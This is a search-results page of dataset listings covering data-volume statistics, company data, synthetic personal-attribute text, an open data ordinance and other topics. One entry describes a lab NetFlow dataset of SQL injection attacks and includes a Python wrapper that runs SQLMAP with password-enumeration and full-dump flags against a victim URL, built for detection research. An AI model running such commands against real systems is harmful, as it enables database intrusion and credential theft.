100+ datasets found
  1. Amount of data created, consumed, and stored 2010-2023, with forecasts to...

    • statista.com
    Updated Jun 30, 2025
    Cite
    Statista (2025). Amount of data created, consumed, and stored 2010-2023, with forecasts to 2028 [Dataset]. https://www.statista.com/statistics/871513/worldwide-data-created/
    Dataset updated
    Jun 30, 2025
    Dataset authored and provided by
    Statista (http://statista.com/)
    Time period covered
    May 2024
    Area covered
    Worldwide
    Description

    The total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly, reaching *** zettabytes in 2024. Over the next five years, up to 2028, global data creation is projected to grow to more than *** zettabytes. In 2020, the amount of data created and replicated reached a new high. The growth was higher than previously expected, driven by increased demand during the COVID-19 pandemic, as more people worked and learned from home and used home entertainment options more often.

    Storage capacity also growing

    Only a small percentage of this newly created data is kept, though: just * percent of the data produced and consumed in 2020 was saved and retained into 2021. In line with the strong growth of the data volume, the installed base of storage capacity is forecast to increase, growing at a compound annual growth rate of **** percent over the forecast period from 2020 to 2025. In 2020, the installed base of storage capacity reached *** zettabytes.

  2. Tutorial: How to use Google Data Studio and ArcGIS Online to create an...

    • search.dataone.org
    • hydroshare.org
    Updated Apr 15, 2022
    Cite
    Sarah Beganskas (2022). Tutorial: How to use Google Data Studio and ArcGIS Online to create an interactive data portal [Dataset]. http://doi.org/10.4211/hs.9edae0ef99224e0b85303c6d45797d56
    Dataset updated
    Apr 15, 2022
    Dataset provided by
    Hydroshare
    Authors
    Sarah Beganskas
    Description

    This tutorial will teach you how to take time-series data from many field sites and create a shareable online map, where clicking on a field location brings you to a page with interactive graph(s).

    The tutorial can be completed with a sample dataset (provided via a Google Drive link within the document) or with your own time-series data from multiple field sites.

    Part 1 covers how to make interactive graphs in Google Data Studio and Part 2 covers how to link data pages to an interactive map with ArcGIS Online. The tutorial will take 1-2 hours to complete.

    An example interactive map and data portal can be found at: https://temple.maps.arcgis.com/apps/View/index.html?appid=a259e4ec88c94ddfbf3528dc8a5d77e8

  3. Company Datasets for Business Profiling

    • datarade.ai
    Updated Feb 23, 2017
    Cite
    Oxylabs (2017). Company Datasets for Business Profiling [Dataset]. https://datarade.ai/data-products/company-datasets-for-business-profiling-oxylabs
    Available download formats: .json, .xml, .csv, .xls
    Dataset updated
    Feb 23, 2017
    Dataset authored and provided by
    Oxylabs
    Area covered
    Canada, Moldova (Republic of), Isle of Man, British Indian Ocean Territory, Andorra, Nepal, Taiwan, Northern Mariana Islands, Tunisia, Bangladesh
    Description

    Company Datasets for valuable business insights!

    Discover new business prospects, identify investment opportunities, track competitor performance, and streamline your sales efforts with comprehensive Company Datasets.

    These datasets are sourced from top industry providers, ensuring you have access to high-quality information:

    • Owler: Gain valuable business insights and competitive intelligence.
    • AngelList: Receive fresh startup data transformed into actionable insights.
    • CrunchBase: Access clean, parsed, and ready-to-use business data from private and public companies.
    • Craft.co: Make data-informed business decisions with Craft.co's company datasets.
    • Product Hunt: Harness the Product Hunt dataset, a leader in curating the best new products.

    We provide fresh and ready-to-use company data, eliminating the need for complex scraping and parsing. Our data includes crucial details such as:

    • Company name;
    • Size;
    • Founding date;
    • Location;
    • Industry;
    • Revenue;
    • Employee count;
    • Competitors.

    You can choose your preferred data delivery method, including various storage options, delivery frequency, and input/output formats.

    Receive datasets in CSV, JSON, and other formats, with storage options like AWS S3 and Google Cloud Storage. Opt for one-time, monthly, quarterly, or bi-annual data delivery.

    With Oxylabs Datasets, you can count on:

    • Fresh and accurate data collected and parsed by our expert web scraping team.
    • Time and resource savings, allowing you to focus on data analysis and achieving your business goals.
    • A customized approach tailored to your specific business needs.
    • Legal compliance in line with GDPR and CCPA standards, thanks to our membership in the Ethical Web Data Collection Initiative.

    Pricing Options:

    Standard Datasets: Choose from various ready-to-use datasets with standardized data schemas, priced from $1,000/month.

    Custom Datasets: Tailor datasets from any public web domain to your unique business needs. Contact our sales team for custom pricing.

    Experience a seamless journey with Oxylabs:

    • Understanding your data needs: We work closely to understand your business nature and daily operations, defining your unique data requirements.
    • Developing a customized solution: Our experts create a custom framework to extract public data using our in-house web scraping infrastructure.
    • Delivering data sample: We provide a sample for your feedback on data quality and the entire delivery process.
    • Continuous data delivery: We continuously collect public data and deliver custom datasets per the agreed frequency.

    Unlock the power of data with Oxylabs' Company Datasets and supercharge your business insights today!

  4. Data from: SQL Injection Attack Netflow

    • data.niaid.nih.gov
    • portalcienciaytecnologia.jcyl.es
    Updated Sep 28, 2022
    Cite
    Adrián Campazas (2022). SQL Injection Attack Netflow [Dataset]. https://data.niaid.nih.gov/resources?id=zenodo_6907251
    Dataset updated
    Sep 28, 2022
    Dataset provided by
    Ignacio Crespo
    Adrián Campazas
    License

    Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    Introduction

    These datasets contain SQL injection attacks (SQLIA) as the malicious NetFlow data. The attacks carried out are Union-query SQL injection and Blind SQL injection, performed with the SQLMAP tool.

    NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

    Datasets

    The first dataset (D1) was collected to train the detection models; the second (D2) was collected using different attacks than those used in training, to test the models and ensure their generalization.

    The datasets contain both benign and malicious traffic. All collected datasets are balanced.

    The version of NetFlow used to build the datasets is 5.

    Dataset   Aim        Samples   Benign-malicious traffic ratio
    D1        Training   400,003   50%
    D2        Test       57,239    50%

    Infrastructure and implementation

    Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has the ipt_netflow sensor installed. The sensor is a Linux kernel module hooked in via Iptables, which processes the packets and converts them into NetFlow flows.

    DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1,800 seconds (30 minutes).

    Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts; users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks: it routes packets to the Internet, and it sends them to a NetFlow data generation node (packets received from the Internet are handled in the same way).

    The malicious traffic (SQLI attacks) was generated using SQLMAP, a penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities.

    The attacks were executed on 16 nodes, each launching SQLMAP with the parameters in the following table; an illustrative launcher sketch follows the table.

    Parameters and descriptions:

    • '--banner', '--current-user', '--current-db', '--hostname', '--is-dba', '--users', '--passwords', '--privileges', '--roles', '--dbs', '--tables', '--columns', '--schema', '--count', '--dump', '--comments': Enumerate users, password hashes, privileges, roles, databases, tables and columns
    • --level=5: Increase the probability of a false positive identification
    • --risk=3: Increase the probability of extracting data
    • --random-agent: Select the User-Agent randomly
    • --batch: Never ask for user input, use the default behavior
    • --answers="follow=Y": Predefined answers to yes
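    For illustration, a minimal Python wrapper that assembles this SQLMAP command line. The flags are exactly those listed above; the wrapper itself and the target URL are hypothetical and not part of DOROTHEA:

    ```python
    # Illustrative launcher for the SQLMAP run described above.
    # The target URL is a hypothetical victim-node form; flags match the table.
    import subprocess

    ENUMERATION_FLAGS = [
        "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
        "--users", "--passwords", "--privileges", "--roles", "--dbs",
        "--tables", "--columns", "--schema", "--count", "--dump", "--comments",
    ]

    def run_sqlmap(target_url: str) -> None:
        cmd = [
            "sqlmap", "-u", target_url,
            *ENUMERATION_FLAGS,
            "--level=5",           # widen the set of injection tests attempted
            "--risk=3",            # allow riskier, data-extracting payloads
            "--random-agent",      # randomize the User-Agent header
            "--batch",             # never prompt; take default answers
            "--answers=follow=Y",  # pre-answer redirect prompts with yes
        ]
        subprocess.run(cmd, check=False)

    # Hypothetical vulnerable form on a victim node (126.52.30.0/24 space).
    run_sqlmap("http://126.52.30.10/form.php?id=1")
    ```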
    

    Every node executed SQLIAs against 200 victim nodes. The victim nodes each deployed a web form vulnerable to Union-type injection attacks, connected to either the MySQL or the SQLServer database engine (50% of the victim nodes deployed MySQL and the other 50% SQLServer).

    The web service was accessible on ports 443 and 80, the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes; for victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions: for D1, SQLIAs were performed using Union attacks on the MySQL and SQLServer databases.

    However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.

    For the MySQL engine we ran MariaDB version 10.4.12; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used for the other engines.

  5. SynthPAI Dataset

    • paperswithcode.com
    Updated Jun 10, 2024
    Cite
    Hanna Yukhymenko; Robin Staab; Mark Vero; Martin Vechev (2024). SynthPAI Dataset [Dataset]. https://paperswithcode.com/dataset/synthpai
    Dataset updated
    Jun 10, 2024
    Authors
    Hanna Yukhymenko; Robin Staab; Mark Vero; Martin Vechev
    Description

    SynthPAI was created to provide a dataset that can be used to investigate the personal attribute inference (PAI) capabilities of LLMs on online texts. Because of the privacy concerns associated with real-world data, open datasets are rare (non-existent) in the research community. SynthPAI is a synthetic dataset that aims to fill this gap.

    Dataset Details

    Dataset Description

    SynthPAI was created using 300 GPT-4 agents seeded with individual personalities interacting with each other in a simulated online forum and consists of 103 threads and 7823 comments. For each profile, we further provide a set of personal attributes that a human could infer from the profile. We additionally conducted a user study to evaluate the quality of the synthetic comments, establishing that humans can barely distinguish between real and synthetic comments.

    Curated by: The dataset was created by SRILab at ETH Zurich. It was not created on behalf of any outside entity.
    Funded by: Two authors of this work are supported by the Swiss State Secretariat for Education, Research and Innovation (SERI) (SERI-funded ERC Consolidator Grant). This project did not, however, receive explicit funding from SERI and was devised independently. Views and opinions expressed are those of the authors only and do not necessarily reflect those of the SERI-funded ERC Consolidator Grant.
    Shared by: SRILab at ETH Zurich
    Language(s) (NLP): English
    License: CC-BY-NC-SA-4.0

    Dataset Sources

    Repository: https://github.com/eth-sri/SynthPAI
    Paper: https://arxiv.org/abs/2406.07217

    Uses

    The dataset is intended to be used as a privacy-preserving method of (i) evaluating the PAI capabilities of language models and (ii) aiding the development of potential defenses against such automated inferences.

    Direct Use

    As in the associated paper, where we include an analysis of the personal attribute inference (PAI) capabilities of 18 state-of-the-art LLMs across different attributes and on anonymized texts.

    Out-of-Scope Use

    The dataset shall not be used as part of any system that performs attribute inferences on real natural persons without their consent or otherwise maliciously.

    Dataset Structure

    We provide the instance descriptions below; an illustrative Python sketch of this layout follows the attribute list. Each data point consists of a single comment (which can be a top-level post):

    Comment

    author str: unique identifier of the person writing

    username str: corresponding username

    parent_id str: unique identifier of the parent comment

    thread_id str: unique identifier of the thread

    children list[str]: unique identifiers of children comments

    profile Profile: profile making the comment - described below

    text str: text of the comment

    guesses list[dict]: Dict containing model estimates of attributes based on the comment. Only contains attributes for which a prediction exists.

    reviews dict: Dict containing human estimates of attributes based on the comment. Each guess contains a corresponding hardness rating (and certainty rating). Contains all attributes.

    The associated profiles are structured as follows:

    Profile

    username str: identifier

    attributes: set of personal attributes that describe the user (directly listed below)

    The corresponding attributes and values are

    Attributes

    Age continuous [18-99] The age of a user in years.

    Place of Birth tuple [city, country] The place of birth of a user. We create tuples jointly for city and country in free-text format. (field name: birth_city_country)

    Location tuple [city, country] The current location of a user. We create tuples jointly for city and country in free-text format. (field name: city_country)

    Education free-text We use a free-text field to describe the user's education level. This includes additional details such as the degree and major. To ensure comparability with the evaluation of prior work, we later map these to a categorical scale: high school, college degree, master's degree, PhD.

    Income Level free-text [low, medium, high, very high] The income level of a user. We first generate a continuous income level in the profile's local currency. In our code, we map this to a categorical value considering the distribution of income levels in the respective profile location. For this, we roughly follow the local equivalents of the following reference levels for the US: Low (<30k USD), Middle (30-60k USD), High (60-150k USD), Very High (>150k USD).

    Occupation free-text The occupation of a user, described as a free-text field.

    Relationship Status categorical [single, In a Relationship, married, divorced, widowed] The relationship status of a user as one of 5 categories.

    Sex categorical [Male, Female] Biological Sex of a profile.
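    For orientation, a minimal Python sketch of the record layout described above. Field names mirror the dataset card; the exact types are assumptions, not the repository's actual code:

    ```python
    # Illustrative only: typed view of the SynthPAI record layout above.
    # Field names follow the dataset card; exact types are assumptions.
    from typing import Optional, TypedDict

    class Profile(TypedDict):
        username: str
        age: int                   # continuous, 18-99
        birth_city_country: str    # "city, country" free text
        city_country: str          # current location, free text
        education: str             # free text, later mapped to categories
        income_level: str          # low / medium / high / very high
        occupation: str            # free text
        relationship_status: str   # single / in a relationship / married / divorced / widowed
        sex: str                   # male / female

    class Comment(TypedDict):
        author: str                # unique identifier of the writer
        username: str
        parent_id: Optional[str]   # None for top-level posts (assumption)
        thread_id: str
        children: list[str]        # identifiers of child comments
        profile: Profile           # profile making the comment
        text: str
        guesses: list[dict]        # model attribute estimates per comment
        reviews: dict              # human estimates with hardness/certainty ratings
    ```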

    Dataset Creation

    Curation Rationale

    SynthPAI was created to provide a dataset that can be used to investigate the personal attribute inference (PAI) capabilities of LLMs on online texts. Because of the privacy concerns associated with real-world data, open datasets are rare (non-existent) in the research community. SynthPAI is a synthetic dataset that aims to fill this gap. We additionally conducted a user study to evaluate the quality of the synthetic comments, establishing that humans can barely distinguish between real and synthetic comments.

    Source Data

    The dataset is fully synthetic and was created using GPT-4 agents (version gpt-4-1106-preview) seeded with individual personalities interacting with each other in a simulated online forum.

    Data Collection and Processing

    The dataset was created by sampling comments from the agents in threads. A human then inferred a set of personal attributes from the sets of comments associated with each profile. Further, the dataset was manually reviewed to remove any offensive or inappropriate content. We give a detailed overview of our dataset-creation procedure in the corresponding paper.

    Annotations

    Annotations are provided by authors of the paper.

    Personal and Sensitive Information

    All contained personal information is purely synthetic and does not relate to any real individual.

    Bias, Risks, and Limitations

    All profiles are synthetic and do not correspond to any real subpopulations. We provide a distribution of the personal attributes of the profiles in the accompanying paper. As the dataset has been created synthetically, data points can inherit limitations (e.g., biases) from the underlying model, GPT-4. While we manually reviewed comments individually, we cannot provide respective guarantees.

    Citation

    BibTeX:

    @misc{2406.07217,
      Author = {Hanna Yukhymenko and Robin Staab and Mark Vero and Martin Vechev},
      Title = {A Synthetic Dataset for Personal Attribute Inference},
      Year = {2024},
      Eprint = {arXiv:2406.07217},
    }

    APA:

    Hanna Yukhymenko, Robin Staab, Mark Vero, Martin Vechev: “A Synthetic Dataset for Personal Attribute Inference”, 2024; arXiv:2406.07217.

    Dataset Card Authors

    Hanna Yukhymenko, Robin Staab, Mark Vero

  6. Louisville Metro KY - Annual Open Data Report 2022

    • catalog.data.gov
    • data.louisvilleky.gov
    Updated Apr 13, 2023
    Cite
    Louisville/Jefferson County Information Consortium (2023). Louisville Metro KY - Annual Open Data Report 2022 [Dataset]. https://catalog.data.gov/dataset/louisville-metro-ky-annual-open-data-report-2022
    Dataset updated
    Apr 13, 2023
    Dataset provided by
    Louisville/Jefferson County Information Consortium
    Area covered
    Kentucky, Louisville
    Description

    On August 25th, 2022, Metro Council passed the Open Data Ordinance; previously, open data reports were published under Mayor Fischer's Executive Order. You can find here both the Open Data Ordinance, 2022 (PDF) and the Mayor's Open Data Executive Order, 2013.

    Open Data Annual Reports

    Per page 6 of the Open Data Ordinance: within one year of the effective date of this Ordinance, and thereafter no later than September 1 of each year, the Open Data Management Team shall submit to the Mayor and Metro Council an annual Open Data Report. The Open Data Management Team (also known as the Data Governance Team) is currently led by the city's Data Officer, Andrew McKinney, in the Office of Civic Innovation and Technology. Previously it was led by the former Data Officer, Michael Schnuerle, and prior to that by the Director of IT.

    Open Data Ordinance O-243-22 Text

    Louisville Metro Government
    Legislation Text
    File #: O-243-22, Version: 3

    ORDINANCE NO. _, SERIES 2022: AN ORDINANCE CREATING A NEW CHAPTER OF THE LOUISVILLE/JEFFERSON COUNTY METRO CODE OF ORDINANCES CREATING AN OPEN DATA POLICY AND REVIEW. (AMENDMENT BY SUBSTITUTION) (AS AMENDED).

    SPONSORED BY: COUNCIL MEMBERS ARTHUR, WINKLER, CHAMBERS ARMSTRONG, PIAGENTINI, DORSEY, AND PRESIDENT JAMES

    WHEREAS, Metro Government is the catalyst for creating a world-class city that provides its citizens with safe and vibrant neighborhoods, great jobs, a strong system of education and innovation, and a high quality of life;

    WHEREAS, it should be easy to do business with Metro Government. Online government interactions mean more convenient services for citizens and businesses, and online government interactions improve the cost effectiveness and accuracy of government operations;

    WHEREAS, an open government also makes certain that every aspect of the built environment also has reliable digital descriptions available to citizens and entrepreneurs for deep engagement mediated by smart devices;

    WHEREAS, every citizen has the right to prompt, efficient service from Metro Government;

    WHEREAS, the adoption of open standards improves transparency, access to public information, and improved coordination and efficiencies among Departments and partner organizations across the public, non-profit and private sectors;

    WHEREAS, by publishing structured standardized data in machine readable formats, Metro Government seeks to encourage the local technology community to develop software applications and tools to display, organize, analyze, and share public record data in new and innovative ways;

    WHEREAS, Metro Government's ability to review data and datasets will facilitate a better understanding of the obstacles the city faces with regard to equity;

    WHEREAS, Metro Government's understanding of inequities, through data and datasets, will assist in creating better policies to tackle inequities in the city;

    WHEREAS, through this Ordinance, Metro Government desires to maintain its continuous improvement in open data and transparency that it initiated via Mayoral Executive Order No. 1, Series 2013;

    WHEREAS, Metro Government's open data work has repeatedly been recognized, as evidenced by its achieving What Works Cities Silver (2018), Gold (2019), and Platinum (2020) certifications. What Works Cities recognizes and celebrates local governments for their exceptional use of data to inform policy and funding decisions, improve services, create operational efficiencies, and engage residents. The Certification program assesses cities on their data-driven decision-making practices, such as whether they are using data to set goals and track progress, allocate funding, evaluate the effectiveness of programs, and achieve desired outcomes. These data-informed strategies enable Certified Cities to be more resilient, respond in crisis situations, increase economic mobility, protect public health, and increase resident satisfaction; and

    WHEREAS, in commitment to the spirit of Open Government, Metro Government will consider public information to be open by default and will proactively publish data and data containing information, consistent with the Kentucky Open Meetings and Open Records Act.

    NOW, THEREFORE, BE IT ORDAINED BY THE COUNCIL OF THE LOUISVILLE/JEFFERSON COUNTY METRO GOVERNMENT AS FOLLOWS:

    SECTION I: A new chapter of the Louisville Metro Code of Ordinances ("LMCO") mandating an Open Data Policy and review process is hereby created as follows:

    § XXX.01 DEFINITIONS. For the purpose of this Chapter, the following definitions shall apply unless the context clearly indicates or requires a different meaning.

    OPEN DATA. Any public record as defined by the Kentucky Open Records Act, which could be made available online using Open Format data, as well as best practice Open Data structures and formats when possible, that is not Protected Information or Sensitive Information, with no legal restrictions on use or reuse. Open Data is not information that is treated as exempt under KRS 61.878 by Metro Government.

    OPEN DATA REPORT. The annual report of the Open Data Management Team, which shall (i) summarize and comment on the state of Open Data availability in Metro Government Departments from the previous year, including, but not limited to, the progress toward achieving the goals of Metro Government's Open Data portal, an assessment of the current scope of compliance, a list of datasets currently available on the Open Data portal, and a description and publication timeline for datasets envisioned to be published on the portal in the following year; and (ii) provide a plan for the next year to improve online public access to Open Data and maintain data quality.

    OPEN DATA MANAGEMENT TEAM. A group consisting of representatives from each Department within Metro Government and chaired by the Data Officer, who is responsible for coordinating implementation of an Open Data Policy and creating the Open Data Report.

    DATA COORDINATORS. The members of an Open Data Management Team facilitated by the Data Officer and the Office of Civic Innovation and Technology.

    DEPARTMENT. Any Metro Government department, office, administrative unit, commission, board, advisory committee, or other division of Metro Government.

    DATA OFFICER. The staff person designated by the city to coordinate and implement the city's open data program and policy.

    DATA. The statistical, factual, quantitative or qualitative information that is maintained or created by or on behalf of Metro Government.

    DATASET. A named collection of related records, with the collection containing data organized or formatted in a specific or prescribed way.

    METADATA. Contextual information that makes the Open Data easier to understand and use.

    OPEN DATA PORTAL. The internet site established and maintained by or on behalf of Metro Government, located at https://data.louisvilleky.gov/ or its successor website.

    OPEN FORMAT. Any widely accepted, nonproprietary, searchable, platform-independent, machine readable method for formatting data which permits automated processes.

    PROTECTED INFORMATION. Any Dataset or portion thereof to which the Department may deny access pursuant to any law, rule or regulation.

    SENSITIVE INFORMATION. Any Data which, if published on the Open Data Portal, could raise privacy, confidentiality or security concerns or have the potential to jeopardize public health, safety or welfare to an extent that is greater than the potential public benefit of publishing that data.

    § XXX.02 OPEN DATA PORTAL

    (A) The Open Data Portal shall serve as the authoritative source for Open Data provided by Metro Government.
    (B) Any Open Data made accessible on Metro Government's Open Data Portal shall use an Open Format.
    (C) In the event a successor website is used, the Data Officer shall notify the Metro Council and shall provide notice to the public on the main city website.

    § XXX.03 OPEN DATA MANAGEMENT TEAM

    (A) The Data Officer of Metro Government will work with the head of each Department to identify a Data Coordinator in each Department. The Open Data Management Team will work to establish a robust, nationally recognized platform that addresses digital infrastructure and Open Data.
    (B) The Open Data Management Team will develop an Open Data Policy that will adopt prevailing Open Format standards for Open Data and develop agreements with regional partners to publish and maintain Open Data that is open and freely available while respecting exemptions allowed by the Kentucky Open Records Act or other federal or state law.

    § XXX.04 DEPARTMENT OPEN DATA CATALOGUE

    (A) Each Department shall retain ownership over the Datasets they submit to the Open Data Portal. The Departments shall also be responsible for all aspects of the quality, integrity and security of the Dataset contents, including updating its Data and associated Metadata.
    (B) Each Department shall be responsible for creating an Open Data catalogue, which shall include comprehensive inventories of information possessed and/or managed by the Department.
    (C) Each Department's Open Data catalogue will classify information holdings as currently "public" or "not yet public;" Departments will work with the Office of Civic Innovation and Technology to develop strategies and timelines for publishing Open Data containing information in a way that is complete, reliable and has a high level of detail.

    § XXX.05 OPEN DATA REPORT AND POLICY REVIEW

    (A) Within one year of the effective date of this Ordinance, and thereafter no later than September 1 of each year, the Open Data Management Team shall submit to the Mayor and Metro Council an annual Open Data Report.
    (B) Metro Council may request a specific Department to report on any data or dataset that may be beneficial or pertinent in implementing policy and legislation.
    (C) In acknowledgment that technology changes rapidly, the Open Data Policy shall be reviewed annually and considered for revisions or additions that will continue to position Metro Government as a leader on issues of

  7. Mozello | Web Hosting & Domain Names | Technology Data

    • datastore.forage.ai
    Updated Sep 22, 2024
    Cite
    (2024). Mozello | Web Hosting & Domain Names | Technology Data [Dataset]. https://datastore.forage.ai/searchresults/?resource_keyword=web
    Dataset updated
    Sep 22, 2024
    Description

    Mozello, SIA, is an innovative website builder that empowers individuals and businesses to create their own unique, modern websites and online stores. With Mozello, users can choose from a range of professionally designed templates and customize their website's layout, colors, and content to fit their brand's identity. The platform offers a user-friendly interface, making it easy for anyone to build and manage their own website without requiring extensive technical skills. Mozello's solutions cater to a diverse range of customers, from entrepreneurs and bloggers to activists and businesses of all sizes.

    Mozello's website builder is built for speed and ease, allowing users to create a website within a day. The platform's features are designed to help users succeed, including responsive design, powerful marketing and SEO tools, and a worry-free domain registration and web hosting solution. With Mozello, users can focus on what matters most - growing their business and online presence. The platform's customer support team is always available to help users overcome any challenges they may face, ensuring they can achieve their goals with ease. By choosing Mozello, users can rest assured that their online presence is in capable and reliable hands.

  8. Data from: Creating predictive clothing size models for online customers

    • tandf.figshare.com
    Updated May 31, 2023
    Cite
    Allison Davidson; Ellen Gundlach (2023). Creating predictive clothing size models for online customers [Dataset]. http://doi.org/10.6084/m9.figshare.19330468.v1
    Available download formats: docx
    Dataset updated
    May 31, 2023
    Dataset provided by
    Taylor & Francis
    Authors
    Allison Davidson; Ellen Gundlach
    License

    Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    A disadvantage of online clothes shopping is the inability to try on clothing to test the fit. A class project is discussed in which students consult with the CEO of an online menswear clothing company to explore how an online clothing customer can be assured of a superior fit: statistical models based on a shopper's height and weight predict the measurements needed to create a suit that feels custom-made. The dataset is most amenable to use with students who have previously been exposed to simple linear regression, and can be used to explore multiple regression topics such as interaction terms, influential points, transformations, and polynomial predictors. Discussion points are included for more advanced topics such as canonical correlation, clustering, and dimension reduction.
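    To make the modeling task concrete, a minimal sketch of one such regression in Python; the column names (height_in, weight_lb, chest_in) and the file name are hypothetical placeholders, not taken from the dataset:

    ```python
    # Illustrative sketch: predict one suit measurement from height and weight.
    # Column and file names are hypothetical placeholders.
    import pandas as pd
    import statsmodels.formula.api as smf

    df = pd.read_csv("suit_measurements.csv")

    # Simple linear regression with an interaction term, one of the
    # multiple-regression topics the project is designed to explore.
    model = smf.ols("chest_in ~ height_in * weight_lb", data=df).fit()
    print(model.summary())

    # Predicted chest measurement for a new shopper.
    new_shopper = pd.DataFrame({"height_in": [70], "weight_lb": [180]})
    print(model.predict(new_shopper))
    ```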

  9. Data from: Synthetic time series data generation for edge analytics

    • zenodo.org
    Updated Nov 25, 2021
    Cite
    Subarmaniam Kannan; Subarmaniam Kannan (2021). Synthetic time series data generation for edge analytics [Dataset]. http://doi.org/10.5281/zenodo.5673806
    Available download formats: bin
    Dataset updated
    Nov 25, 2021
    Dataset provided by
    Zenodo (http://zenodo.org/)
    Authors
    Subarmaniam Kannan; Subarmaniam Kannan
    License

    Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
    License information was derived automatically

    Description

    In this research, we create synthetic data with features that are like data from IoT devices. We use an existing air quality dataset that includes temperature and gas sensor measurements. This real-time dataset includes component values for the Air Quality Index (AQI) and ppm concentrations for various polluting gases. We build a JavaScript Object Notation (JSON) model that captures the distribution of variables and the structure of this real dataset in order to generate the synthetic data. Based on the synthetic dataset and the original dataset, we create a comparative predictive model. Analysis of the predictive model built on the synthetic dataset shows that it can be successfully used for edge analytics purposes, replacing real-world datasets. There is no significant difference between the real-world dataset and the synthetic dataset. The generated synthetic data requires no modification to suit the edge computing requirements. The framework can generate correct synthetic datasets based on JSON schema attributes. The accuracy, precision, and recall values for the real and synthetic datasets indicate that the logistic regression model is capable of successfully classifying the data.
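    A minimal sketch of the idea in Python: capture per-variable distribution parameters from the real data into a JSON model, then sample synthetic rows from it. The schema layout and file names below are assumptions, not the authors' exact format:

    ```python
    # Illustrative sketch of JSON-model-driven synthetic data generation.
    # The model layout below is an assumption, not the paper's exact schema.
    import json
    import numpy as np
    import pandas as pd

    def build_model(df: pd.DataFrame) -> dict:
        """Capture mean/std for each numeric column of the real dataset."""
        return {col: {"mean": float(df[col].mean()), "std": float(df[col].std())}
                for col in df.select_dtypes("number").columns}

    def generate(model: dict, n_rows: int, seed: int = 0) -> pd.DataFrame:
        """Sample synthetic rows from the captured per-column distributions."""
        rng = np.random.default_rng(seed)
        return pd.DataFrame({col: rng.normal(p["mean"], p["std"], n_rows)
                             for col, p in model.items()})

    real = pd.read_csv("air_quality.csv")  # hypothetical AQI/ppm dataset
    model = build_model(real)
    with open("model.json", "w") as f:
        json.dump(model, f)                # the JSON model of the data
    synthetic = generate(model, n_rows=len(real))
    ```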

  10. Data from: Current and projected research data storage needs of Agricultural...

    • catalog.data.gov
    • agdatacommons.nal.usda.gov
    Updated Apr 21, 2025
    Cite
    Agricultural Research Service (2025). Current and projected research data storage needs of Agricultural Research Service researchers in 2016 [Dataset]. https://catalog.data.gov/dataset/current-and-projected-research-data-storage-needs-of-agricultural-research-service-researc-f33da
    Dataset updated
    Apr 21, 2025
    Dataset provided by
    Agricultural Research Service (https://www.ars.usda.gov/)
    Description

    The USDA Agricultural Research Service (ARS) recently established SCINet, which consists of a shared high performance computing resource, Ceres, and the dedicated high-speed Internet2 network used to access Ceres. Current and potential SCINet users are using and generating very large datasets, so SCINet needs to be provisioned with adequate data storage for their active computing. It is not designed to hold data beyond active research phases. At the same time, the National Agricultural Library has been developing the Ag Data Commons, a research data catalog and repository designed for public data release and professional data curation. Ag Data Commons needs to anticipate the size and nature of data it will be tasked with handling.

    The ARS Web-enabled Databases Working Group, organized under the SCINet initiative, conducted a study to establish baseline data storage needs and practices, and to make projections that could inform future infrastructure design, purchases, and policies. The SCINet Web-enabled Databases Working Group helped develop the survey which is the basis for an internal report. While the report was for internal use, the survey and resulting data may be generally useful and are being released publicly.

    From October 24 to November 8, 2016, we administered a 17-question survey (Appendix A) by emailing a Survey Monkey link to all ARS Research Leaders, intending to cover data storage needs of all 1,675 SY (Category 1 and Category 4) scientists. We designed the survey to accommodate either individual researcher responses or group responses. Research Leaders could decide, based on their unit's practices or their management preferences, whether to delegate response to a data management expert in their unit, to all members of their unit, or to collate responses from their unit themselves before reporting in the survey.

    Larger storage ranges cover vastly different amounts of data, so the implications here could be significant depending on whether the true amount is at the lower or higher end of the range. Therefore, we requested more detail from "Big Data users," those 47 respondents who indicated they had more than 10 to 100 TB or over 100 TB total current data (Q5). All other respondents are called "Small Data users." Because not all of these follow-up requests were successful, we used actual follow-up responses to estimate likely responses for those who did not respond. We defined active data as data that would be used within the next six months; all other data would be considered inactive, or archival. To calculate per-person storage needs, we used the high end of the reported range divided by 1 for an individual response, or by G, the number of individuals in a group response. For Big Data users we used the actual reported values or estimated likely values.

    Resources in this dataset:

    • Resource Title: Appendix A: ARS data storage survey questions.
      File Name: Appendix A.pdf
      Resource Description: The full list of questions asked with the possible responses. The survey was not administered using this PDF, but the PDF was generated directly from the administered survey using the Print option under Design Survey. Asterisked questions were required. A list of Research Units and their associated codes was provided in a drop-down not shown here.
      Resource Software Recommended: Adobe Acrobat, url: https://get.adobe.com/reader/

    • Resource Title: CSV of Responses from ARS Researcher Data Storage Survey.
      File Name: Machine-readable survey response data.csv
      Resource Description: CSV file that includes raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed. This is the same data as in the Excel spreadsheet (also provided).

    • Resource Title: Responses from ARS Researcher Data Storage Survey.
      File Name: Data Storage Survey Data for public release.xlsx
